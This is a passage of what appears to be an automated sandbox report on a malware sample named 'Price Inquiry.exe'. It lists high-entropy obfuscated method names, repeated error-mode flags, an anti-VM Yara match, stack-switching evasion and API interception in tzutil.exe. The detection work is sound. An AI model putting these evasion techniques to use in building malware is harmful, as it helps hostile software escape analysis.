Source: 0.2.Price Inquiry.exe.40205a0.3.raw.unpack, XJAGF4IyZRFgp2qVTh.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'o0LMYNdBXZ', 'JIaMmohMs9', 'w39MzTjEJX', 'NH6j2fTIlt', 'Lm8jXEwGvc', 'J50jMOR3yy', 'APyjjoH9bL', 'c2snCLgt3tJq2mRaDWW'
Source: 0.2.Price Inquiry.exe.40205a0.3.raw.unpack, QZIZ1pzpgQlTCs3UDV.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uDoJ7nrdj0', 'gOHJtiIvq1', 'iXgJpF1wyN', 'FP8JAkEZMp', 'dTrJGt3BMT', 'dhWJJdjaT1', 'kAqJZrx240'
Source: 0.2.Price Inquiry.exe.40205a0.3.raw.unpack, lYbwjeBTMebhM2nvZU.cs	High entropy of concatenated method names: 'JCH6DXpUH2', 'WZJ6NeYG2q', 'CaJ6BNDqVh', 'IJqBmn3eCH', 'BsTBzX3qQM', 'wXD62KIk52', 'Js16Xba9gg', 'ald6Mit01u', 'dYd6jXVqbf', 'nFG6ckCuAr'
Source: 0.2.Price Inquiry.exe.40205a0.3.raw.unpack, r2JwPMnHBnGvwoR3l8.cs	High entropy of concatenated method names: 'tY4AbENOWY', 'dHVAmD4S7d', 'gHKG2ym3m6', 'LnjGX8UYFy', 'hnkAnFG6S6', 'MXRAa8ejmy', 'RKvAwhmBPP', 'xR1Al6Dt2K', 'uMAAvJRllT', 'GQfAWRo8Rj'
Source: 0.2.Price Inquiry.exe.40205a0.3.raw.unpack, YjFstgcf43TT2phh6v.cs	High entropy of concatenated method names: 'gp8NqoflAe', 'V5NNFSkSO5', 'GCtNEXrQTk', 'PoRNx8Hccy', 'nEcNt4aD8r', 'DhhNpbsb6g', 'xedNANnxPg', 'l7nNGsT6R7', 'L3FNJEqMPu', 'NisNZyGjAX'
Source: 0.2.Price Inquiry.exe.40205a0.3.raw.unpack, AaoJxxUR5A2r4FK02k.cs	High entropy of concatenated method names: 'ON54l62WaG', 'PP44vrPtwj', 'fyQ4WLHAvM', 'rfQ4Qaerko', 'l1S4RGmS25', 'c0P4saZ65X', 'mE14gd45Gw', 'PjB4bD7bBp', 'cXD4YopJxI', 'yl94mdAsuI'
Source: 0.2.Price Inquiry.exe.40205a0.3.raw.unpack, CWGl8b1RBygUuH78mO.cs	High entropy of concatenated method names: 'sboGDT8a05', 'krMG4UyfEY', 'MTGGN1kPig', 'TEjGfGwqoI', 'OwGGBBcC5J', 'pT5G6LswJh', 'uXZG054yOa', 'uNXGidU3GN', 'BS8GdVLebc', 'LvdGOheA8w'
Source: 0.2.Price Inquiry.exe.40205a0.3.raw.unpack, UPicN8fCwDCkCEL5dr.cs	High entropy of concatenated method names: 'qFvX6Npg6d', 'pD1X0eOXwG', 'G0HXdeu8We', 'EeJXO9x9DX', 'PySXt1lqfH', 'Qj4XpfH45T', 't5lPB70Wo2ajTA74sF', 'OqFFFhvSeUaXcTpUgZ', 'LajXXYnBtu', 'D3oXjDrjMy'
Source: 0.2.Price Inquiry.exe.40205a0.3.raw.unpack, Ux3Y73WP4VwbXfDD8Fk.cs	High entropy of concatenated method names: 'nUkJ35bMHC', 'KyWJCfkI2m', 'LO4J9jhJ3S', 'gnmJq73oEy', 'DaKJ1h0qBd', 'jhEJFvaFTk', 'XpSJk5cm8C', 'imYJE9GrTv', 'jovJxsOC6D', 'ShVJPROOLC'
Source: 0.2.Price Inquiry.exe.40205a0.3.raw.unpack, w6pZx09e48TXup4oLE.cs	High entropy of concatenated method names: 'PmOJXtTsuV', 'U5YJjXRDEd', 'C4UJc13kPK', 'tubJDLg9M7', 'Ea9J4VmTiK', 'CUeJfL5alb', 'h4QJBOBrws', 'C21Gg0p6WT', 'ik7GbfXWx2', 'FnbGYhTOjY'
Source: 0.2.Price Inquiry.exe.40205a0.3.raw.unpack, P99MO2DqcaHaXbIteU.cs	High entropy of concatenated method names: 'IOQ9TtxWW', 'mO2qYFafq', 'awxFJx7CU', 'e4Jk6q2o1', 'mCcxZ1o8f', 'n41PYwFb9', 'qU4GtKZD4OtVwKTgpW', 'b63JpEHa68Ljm5lgHN', 'sA8GIrmU1', 'RmdZ8QWk2'
Source: 0.2.Price Inquiry.exe.40205a0.3.raw.unpack, ajS6vAQILMf3FePF3W.cs	High entropy of concatenated method names: 'SUFBrNPLFi', 'CC5B4OnWQf', 'JDKBf4hwDx', 'w5GB6selRq', 'AliB038tUP', 'mfWfRuFr35', 'iPnfsbOtNP', 'EGUfg60QaR', 'yjMfbLvXNH', 'BEvfY3uUJB'
Source: 0.2.Price Inquiry.exe.40205a0.3.raw.unpack, ira7vHlygGc23rBjeF.cs	High entropy of concatenated method names: 'wFGGIUkhg0', 'j0JGK1XKaH', 'qcZG5tcpOT', 'ztkGVDH3P8', 'XKrGlWsBfH', 'KSFGuDtZO3', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Price Inquiry.exe.40205a0.3.raw.unpack, zteHKQy9VUdw0q7wIs.cs	High entropy of concatenated method names: 'zGS7EH4vxv', 'KVS7xyKPST', 'J4Y7ITetVL', 'dmi7KOI7CB', 'Rxd7VHLNUL', 'rDa7ujqJCY', 'yMq7o6jym5', 'agP7TylLKq', 'qXs7evhGBd', 'qA87nMSw5Y'
Source: 0.2.Price Inquiry.exe.40205a0.3.raw.unpack, Qyb99XHPYAu7CMxFYj.cs	High entropy of concatenated method names: 'd1l635byfO', 'r8q6CI2lNV', 'WZP697iL7C', 'NjG6qWISWD', 'e5P618GOjo', 'j6X6Fwjwv3', 'qxu6k0jxYy', 'pbH6EXOIDi', 'S6R6xUuDCO', 'Spy6PxPexu'
Source: 0.2.Price Inquiry.exe.40205a0.3.raw.unpack, F4vrNHsLiQSC3Oylay.cs	High entropy of concatenated method names: 'gFSf1594OS', 'tKgfkccvsg', 'heDN5I13oW', 'LgxNV2iAte', 'hpjNui6nYV', 'AKENhlQ7FL', 'AocNoEEm8x', 'mmrNT3PZmw', 'dk6NUnriDV', 'nyVNexlExw'
Source: 0.2.Price Inquiry.exe.40205a0.3.raw.unpack, l0whQDvb4Q48xORYV6.cs	High entropy of concatenated method names: 'DBFteRswFC', 'BdWtaBePKF', 'Glktl6vj0T', 'sDTtvZLy9m', 'JuCtKeLa4l', 'dTvt5o1l1s', 'sQ8tVwfmV0', 'loGtuAt3qU', 'HYAthdAQph', 'cjEtoHvhXC'
Source: 0.2.Price Inquiry.exe.40205a0.3.raw.unpack, HBHgOYKYJebUq7w0xB.cs	High entropy of concatenated method names: 'NGTAdJ9ZI9', 'J1qAON1Vue', 'ToString', 'zRNAD58Lfw', 'DOLA4mJFcA', 'AElANwV92M', 'i0cAfFN1Cr', 'nC1ABGZyNi', 'gxHA61lWVS', 'zVHA0kA4m2'
Source: 0.2.Price Inquiry.exe.79a0000.5.raw.unpack, t6GfKnmHYpwpCSCCjl.cs	High entropy of concatenated method names: 'ohgjr0VBwr', 'ti0jDFp7RC', 'sF0j4IPFSp', 'Hy2jNPt0Bk', 'csljfa2Dgc', 'mIqjBxWJB0', 'DQ9j6lsyox', 'MYNj06tKcd', 'uNSjildMFP', 'aVsjdVhq8q'
Source: 0.2.Price Inquiry.exe.79a0000.5.raw.unpack, JRBr5URymULf9YT4Zh.cs	High entropy of concatenated method names: 'Dispose', 'bZ8XYni8Oi', 'WhyMK4on7o', 'G7qSS6aBmm', 'gPNXmK7f3O', 'Rl3XzFT06C', 'ProcessDialogKey', 'CmIM2ZcuLK', 'Ba8MXtPLRd', 'kfYMMMlZms'
Source: 0.2.Price Inquiry.exe.79a0000.5.raw.unpack, KZVZQQa8VUxqSC8DSa.cs	High entropy of concatenated method names: 'ToString', 'Fa5pn3yflj', 'lLYpKYIVhR', 'qg6p5c56ll', 'XcNpVY8yrW', 'o5NpujeU2F', 'Irmphv4hn6', 'S4pposesxT', 'EaTpT6LRns', 'O28pUPPGEd'
Source: 0.2.Price Inquiry.exe.79a0000.5.raw.unpack, K8VuqkW7uTS3bswUVa1.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fOSZljo30i', 'gN6ZvLJhDk', 'CXfZW1J6AD', 'Ae8ZQmJCmN', 'iNRZRCN2cZ', 'C7AZsJbsmF', 'M3PZgbSbTU'
Source: 0.2.Price Inquiry.exe.79a0000.5.raw.unpack, XJAGF4IyZRFgp2qVTh.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'o0LMYNdBXZ', 'JIaMmohMs9', 'w39MzTjEJX', 'NH6j2fTIlt', 'Lm8jXEwGvc', 'J50jMOR3yy', 'APyjjoH9bL', 'c2snCLgt3tJq2mRaDWW'
Source: 0.2.Price Inquiry.exe.79a0000.5.raw.unpack, QZIZ1pzpgQlTCs3UDV.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uDoJ7nrdj0', 'gOHJtiIvq1', 'iXgJpF1wyN', 'FP8JAkEZMp', 'dTrJGt3BMT', 'dhWJJdjaT1', 'kAqJZrx240'
Source: 0.2.Price Inquiry.exe.79a0000.5.raw.unpack, lYbwjeBTMebhM2nvZU.cs	High entropy of concatenated method names: 'JCH6DXpUH2', 'WZJ6NeYG2q', 'CaJ6BNDqVh', 'IJqBmn3eCH', 'BsTBzX3qQM', 'wXD62KIk52', 'Js16Xba9gg', 'ald6Mit01u', 'dYd6jXVqbf', 'nFG6ckCuAr'
Source: 0.2.Price Inquiry.exe.79a0000.5.raw.unpack, r2JwPMnHBnGvwoR3l8.cs	High entropy of concatenated method names: 'tY4AbENOWY', 'dHVAmD4S7d', 'gHKG2ym3m6', 'LnjGX8UYFy', 'hnkAnFG6S6', 'MXRAa8ejmy', 'RKvAwhmBPP', 'xR1Al6Dt2K', 'uMAAvJRllT', 'GQfAWRo8Rj'
Source: 0.2.Price Inquiry.exe.79a0000.5.raw.unpack, YjFstgcf43TT2phh6v.cs	High entropy of concatenated method names: 'gp8NqoflAe', 'V5NNFSkSO5', 'GCtNEXrQTk', 'PoRNx8Hccy', 'nEcNt4aD8r', 'DhhNpbsb6g', 'xedNANnxPg', 'l7nNGsT6R7', 'L3FNJEqMPu', 'NisNZyGjAX'
Source: 0.2.Price Inquiry.exe.79a0000.5.raw.unpack, AaoJxxUR5A2r4FK02k.cs	High entropy of concatenated method names: 'ON54l62WaG', 'PP44vrPtwj', 'fyQ4WLHAvM', 'rfQ4Qaerko', 'l1S4RGmS25', 'c0P4saZ65X', 'mE14gd45Gw', 'PjB4bD7bBp', 'cXD4YopJxI', 'yl94mdAsuI'
Source: 0.2.Price Inquiry.exe.79a0000.5.raw.unpack, CWGl8b1RBygUuH78mO.cs	High entropy of concatenated method names: 'sboGDT8a05', 'krMG4UyfEY', 'MTGGN1kPig', 'TEjGfGwqoI', 'OwGGBBcC5J', 'pT5G6LswJh', 'uXZG054yOa', 'uNXGidU3GN', 'BS8GdVLebc', 'LvdGOheA8w'
Source: 0.2.Price Inquiry.exe.79a0000.5.raw.unpack, UPicN8fCwDCkCEL5dr.cs	High entropy of concatenated method names: 'qFvX6Npg6d', 'pD1X0eOXwG', 'G0HXdeu8We', 'EeJXO9x9DX', 'PySXt1lqfH', 'Qj4XpfH45T', 't5lPB70Wo2ajTA74sF', 'OqFFFhvSeUaXcTpUgZ', 'LajXXYnBtu', 'D3oXjDrjMy'
Source: 0.2.Price Inquiry.exe.79a0000.5.raw.unpack, Ux3Y73WP4VwbXfDD8Fk.cs	High entropy of concatenated method names: 'nUkJ35bMHC', 'KyWJCfkI2m', 'LO4J9jhJ3S', 'gnmJq73oEy', 'DaKJ1h0qBd', 'jhEJFvaFTk', 'XpSJk5cm8C', 'imYJE9GrTv', 'jovJxsOC6D', 'ShVJPROOLC'
Source: 0.2.Price Inquiry.exe.79a0000.5.raw.unpack, w6pZx09e48TXup4oLE.cs	High entropy of concatenated method names: 'PmOJXtTsuV', 'U5YJjXRDEd', 'C4UJc13kPK', 'tubJDLg9M7', 'Ea9J4VmTiK', 'CUeJfL5alb', 'h4QJBOBrws', 'C21Gg0p6WT', 'ik7GbfXWx2', 'FnbGYhTOjY'
Source: 0.2.Price Inquiry.exe.79a0000.5.raw.unpack, P99MO2DqcaHaXbIteU.cs	High entropy of concatenated method names: 'IOQ9TtxWW', 'mO2qYFafq', 'awxFJx7CU', 'e4Jk6q2o1', 'mCcxZ1o8f', 'n41PYwFb9', 'qU4GtKZD4OtVwKTgpW', 'b63JpEHa68Ljm5lgHN', 'sA8GIrmU1', 'RmdZ8QWk2'
Source: 0.2.Price Inquiry.exe.79a0000.5.raw.unpack, ajS6vAQILMf3FePF3W.cs	High entropy of concatenated method names: 'SUFBrNPLFi', 'CC5B4OnWQf', 'JDKBf4hwDx', 'w5GB6selRq', 'AliB038tUP', 'mfWfRuFr35', 'iPnfsbOtNP', 'EGUfg60QaR', 'yjMfbLvXNH', 'BEvfY3uUJB'
Source: 0.2.Price Inquiry.exe.79a0000.5.raw.unpack, ira7vHlygGc23rBjeF.cs	High entropy of concatenated method names: 'wFGGIUkhg0', 'j0JGK1XKaH', 'qcZG5tcpOT', 'ztkGVDH3P8', 'XKrGlWsBfH', 'KSFGuDtZO3', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Price Inquiry.exe.79a0000.5.raw.unpack, zteHKQy9VUdw0q7wIs.cs	High entropy of concatenated method names: 'zGS7EH4vxv', 'KVS7xyKPST', 'J4Y7ITetVL', 'dmi7KOI7CB', 'Rxd7VHLNUL', 'rDa7ujqJCY', 'yMq7o6jym5', 'agP7TylLKq', 'qXs7evhGBd', 'qA87nMSw5Y'
Source: 0.2.Price Inquiry.exe.79a0000.5.raw.unpack, Qyb99XHPYAu7CMxFYj.cs	High entropy of concatenated method names: 'd1l635byfO', 'r8q6CI2lNV', 'WZP697iL7C', 'NjG6qWISWD', 'e5P618GOjo', 'j6X6Fwjwv3', 'qxu6k0jxYy', 'pbH6EXOIDi', 'S6R6xUuDCO', 'Spy6PxPexu'
Source: 0.2.Price Inquiry.exe.79a0000.5.raw.unpack, F4vrNHsLiQSC3Oylay.cs	High entropy of concatenated method names: 'gFSf1594OS', 'tKgfkccvsg', 'heDN5I13oW', 'LgxNV2iAte', 'hpjNui6nYV', 'AKENhlQ7FL', 'AocNoEEm8x', 'mmrNT3PZmw', 'dk6NUnriDV', 'nyVNexlExw'
Source: 0.2.Price Inquiry.exe.79a0000.5.raw.unpack, l0whQDvb4Q48xORYV6.cs	High entropy of concatenated method names: 'DBFteRswFC', 'BdWtaBePKF', 'Glktl6vj0T', 'sDTtvZLy9m', 'JuCtKeLa4l', 'dTvt5o1l1s', 'sQ8tVwfmV0', 'loGtuAt3qU', 'HYAthdAQph', 'cjEtoHvhXC'
Source: 0.2.Price Inquiry.exe.79a0000.5.raw.unpack, HBHgOYKYJebUq7w0xB.cs	High entropy of concatenated method names: 'NGTAdJ9ZI9', 'J1qAON1Vue', 'ToString', 'zRNAD58Lfw', 'DOLA4mJFcA', 'AElANwV92M', 'i0cAfFN1Cr', 'nC1ABGZyNi', 'gxHA61lWVS', 'zVHA0kA4m2'
Source: 0.2.Price Inquiry.exe.40a85c0.2.raw.unpack, t6GfKnmHYpwpCSCCjl.cs	High entropy of concatenated method names: 'ohgjr0VBwr', 'ti0jDFp7RC', 'sF0j4IPFSp', 'Hy2jNPt0Bk', 'csljfa2Dgc', 'mIqjBxWJB0', 'DQ9j6lsyox', 'MYNj06tKcd', 'uNSjildMFP', 'aVsjdVhq8q'
Source: 0.2.Price Inquiry.exe.40a85c0.2.raw.unpack, JRBr5URymULf9YT4Zh.cs	High entropy of concatenated method names: 'Dispose', 'bZ8XYni8Oi', 'WhyMK4on7o', 'G7qSS6aBmm', 'gPNXmK7f3O', 'Rl3XzFT06C', 'ProcessDialogKey', 'CmIM2ZcuLK', 'Ba8MXtPLRd', 'kfYMMMlZms'
Source: 0.2.Price Inquiry.exe.40a85c0.2.raw.unpack, KZVZQQa8VUxqSC8DSa.cs	High entropy of concatenated method names: 'ToString', 'Fa5pn3yflj', 'lLYpKYIVhR', 'qg6p5c56ll', 'XcNpVY8yrW', 'o5NpujeU2F', 'Irmphv4hn6', 'S4pposesxT', 'EaTpT6LRns', 'O28pUPPGEd'
Source: 0.2.Price Inquiry.exe.40a85c0.2.raw.unpack, K8VuqkW7uTS3bswUVa1.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fOSZljo30i', 'gN6ZvLJhDk', 'CXfZW1J6AD', 'Ae8ZQmJCmN', 'iNRZRCN2cZ', 'C7AZsJbsmF', 'M3PZgbSbTU'
Source: 0.2.Price Inquiry.exe.40a85c0.2.raw.unpack, XJAGF4IyZRFgp2qVTh.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'o0LMYNdBXZ', 'JIaMmohMs9', 'w39MzTjEJX', 'NH6j2fTIlt', 'Lm8jXEwGvc', 'J50jMOR3yy', 'APyjjoH9bL', 'c2snCLgt3tJq2mRaDWW'
Source: 0.2.Price Inquiry.exe.40a85c0.2.raw.unpack, QZIZ1pzpgQlTCs3UDV.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uDoJ7nrdj0', 'gOHJtiIvq1', 'iXgJpF1wyN', 'FP8JAkEZMp', 'dTrJGt3BMT', 'dhWJJdjaT1', 'kAqJZrx240'
Source: 0.2.Price Inquiry.exe.40a85c0.2.raw.unpack, lYbwjeBTMebhM2nvZU.cs	High entropy of concatenated method names: 'JCH6DXpUH2', 'WZJ6NeYG2q', 'CaJ6BNDqVh', 'IJqBmn3eCH', 'BsTBzX3qQM', 'wXD62KIk52', 'Js16Xba9gg', 'ald6Mit01u', 'dYd6jXVqbf', 'nFG6ckCuAr'
Source: 0.2.Price Inquiry.exe.40a85c0.2.raw.unpack, r2JwPMnHBnGvwoR3l8.cs	High entropy of concatenated method names: 'tY4AbENOWY', 'dHVAmD4S7d', 'gHKG2ym3m6', 'LnjGX8UYFy', 'hnkAnFG6S6', 'MXRAa8ejmy', 'RKvAwhmBPP', 'xR1Al6Dt2K', 'uMAAvJRllT', 'GQfAWRo8Rj'
Source: 0.2.Price Inquiry.exe.40a85c0.2.raw.unpack, YjFstgcf43TT2phh6v.cs	High entropy of concatenated method names: 'gp8NqoflAe', 'V5NNFSkSO5', 'GCtNEXrQTk', 'PoRNx8Hccy', 'nEcNt4aD8r', 'DhhNpbsb6g', 'xedNANnxPg', 'l7nNGsT6R7', 'L3FNJEqMPu', 'NisNZyGjAX'
Source: 0.2.Price Inquiry.exe.40a85c0.2.raw.unpack, AaoJxxUR5A2r4FK02k.cs	High entropy of concatenated method names: 'ON54l62WaG', 'PP44vrPtwj', 'fyQ4WLHAvM', 'rfQ4Qaerko', 'l1S4RGmS25', 'c0P4saZ65X', 'mE14gd45Gw', 'PjB4bD7bBp', 'cXD4YopJxI', 'yl94mdAsuI'
Source: 0.2.Price Inquiry.exe.40a85c0.2.raw.unpack, CWGl8b1RBygUuH78mO.cs	High entropy of concatenated method names: 'sboGDT8a05', 'krMG4UyfEY', 'MTGGN1kPig', 'TEjGfGwqoI', 'OwGGBBcC5J', 'pT5G6LswJh', 'uXZG054yOa', 'uNXGidU3GN', 'BS8GdVLebc', 'LvdGOheA8w'
Source: 0.2.Price Inquiry.exe.40a85c0.2.raw.unpack, UPicN8fCwDCkCEL5dr.cs	High entropy of concatenated method names: 'qFvX6Npg6d', 'pD1X0eOXwG', 'G0HXdeu8We', 'EeJXO9x9DX', 'PySXt1lqfH', 'Qj4XpfH45T', 't5lPB70Wo2ajTA74sF', 'OqFFFhvSeUaXcTpUgZ', 'LajXXYnBtu', 'D3oXjDrjMy'
Source: 0.2.Price Inquiry.exe.40a85c0.2.raw.unpack, Ux3Y73WP4VwbXfDD8Fk.cs	High entropy of concatenated method names: 'nUkJ35bMHC', 'KyWJCfkI2m', 'LO4J9jhJ3S', 'gnmJq73oEy', 'DaKJ1h0qBd', 'jhEJFvaFTk', 'XpSJk5cm8C', 'imYJE9GrTv', 'jovJxsOC6D', 'ShVJPROOLC'
Source: 0.2.Price Inquiry.exe.40a85c0.2.raw.unpack, w6pZx09e48TXup4oLE.cs	High entropy of concatenated method names: 'PmOJXtTsuV', 'U5YJjXRDEd', 'C4UJc13kPK', 'tubJDLg9M7', 'Ea9J4VmTiK', 'CUeJfL5alb', 'h4QJBOBrws', 'C21Gg0p6WT', 'ik7GbfXWx2', 'FnbGYhTOjY'
Source: 0.2.Price Inquiry.exe.40a85c0.2.raw.unpack, P99MO2DqcaHaXbIteU.cs	High entropy of concatenated method names: 'IOQ9TtxWW', 'mO2qYFafq', 'awxFJx7CU', 'e4Jk6q2o1', 'mCcxZ1o8f', 'n41PYwFb9', 'qU4GtKZD4OtVwKTgpW', 'b63JpEHa68Ljm5lgHN', 'sA8GIrmU1', 'RmdZ8QWk2'
Source: 0.2.Price Inquiry.exe.40a85c0.2.raw.unpack, ajS6vAQILMf3FePF3W.cs	High entropy of concatenated method names: 'SUFBrNPLFi', 'CC5B4OnWQf', 'JDKBf4hwDx', 'w5GB6selRq', 'AliB038tUP', 'mfWfRuFr35', 'iPnfsbOtNP', 'EGUfg60QaR', 'yjMfbLvXNH', 'BEvfY3uUJB'
Source: 0.2.Price Inquiry.exe.40a85c0.2.raw.unpack, ira7vHlygGc23rBjeF.cs	High entropy of concatenated method names: 'wFGGIUkhg0', 'j0JGK1XKaH', 'qcZG5tcpOT', 'ztkGVDH3P8', 'XKrGlWsBfH', 'KSFGuDtZO3', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Price Inquiry.exe.40a85c0.2.raw.unpack, zteHKQy9VUdw0q7wIs.cs	High entropy of concatenated method names: 'zGS7EH4vxv', 'KVS7xyKPST', 'J4Y7ITetVL', 'dmi7KOI7CB', 'Rxd7VHLNUL', 'rDa7ujqJCY', 'yMq7o6jym5', 'agP7TylLKq', 'qXs7evhGBd', 'qA87nMSw5Y'
Source: 0.2.Price Inquiry.exe.40a85c0.2.raw.unpack, Qyb99XHPYAu7CMxFYj.cs	High entropy of concatenated method names: 'd1l635byfO', 'r8q6CI2lNV', 'WZP697iL7C', 'NjG6qWISWD', 'e5P618GOjo', 'j6X6Fwjwv3', 'qxu6k0jxYy', 'pbH6EXOIDi', 'S6R6xUuDCO', 'Spy6PxPexu'
Source: 0.2.Price Inquiry.exe.40a85c0.2.raw.unpack, F4vrNHsLiQSC3Oylay.cs	High entropy of concatenated method names: 'gFSf1594OS', 'tKgfkccvsg', 'heDN5I13oW', 'LgxNV2iAte', 'hpjNui6nYV', 'AKENhlQ7FL', 'AocNoEEm8x', 'mmrNT3PZmw', 'dk6NUnriDV', 'nyVNexlExw'
Source: 0.2.Price Inquiry.exe.40a85c0.2.raw.unpack, l0whQDvb4Q48xORYV6.cs	High entropy of concatenated method names: 'DBFteRswFC', 'BdWtaBePKF', 'Glktl6vj0T', 'sDTtvZLy9m', 'JuCtKeLa4l', 'dTvt5o1l1s', 'sQ8tVwfmV0', 'loGtuAt3qU', 'HYAthdAQph', 'cjEtoHvhXC'
Source: 0.2.Price Inquiry.exe.40a85c0.2.raw.unpack, HBHgOYKYJebUq7w0xB.cs	High entropy of concatenated method names: 'NGTAdJ9ZI9', 'J1qAON1Vue', 'ToString', 'zRNAD58Lfw', 'DOLA4mJFcA', 'AElANwV92M', 'i0cAfFN1Cr', 'nC1ABGZyNi', 'gxHA61lWVS', 'zVHA0kA4m2'

Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: Price Inquiry.exe PID: 4568, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\tzutil.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\tzutil.exe	API/Special instruction interceptor: Address: 7FFDB442D7E4
Source: C:\Windows\SysWOW64\tzutil.exe	API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\tzutil.exe	API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\tzutil.exe	API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\tzutil.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\tzutil.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\tzutil.exe	API/Special instruction interceptor: Address: 7FFDB442DA44

Source: C:\Users\user\Desktop\Price Inquiry.exe	Memory allocated: 1110000 memory reserve \| memory write watch	Jump to behavior
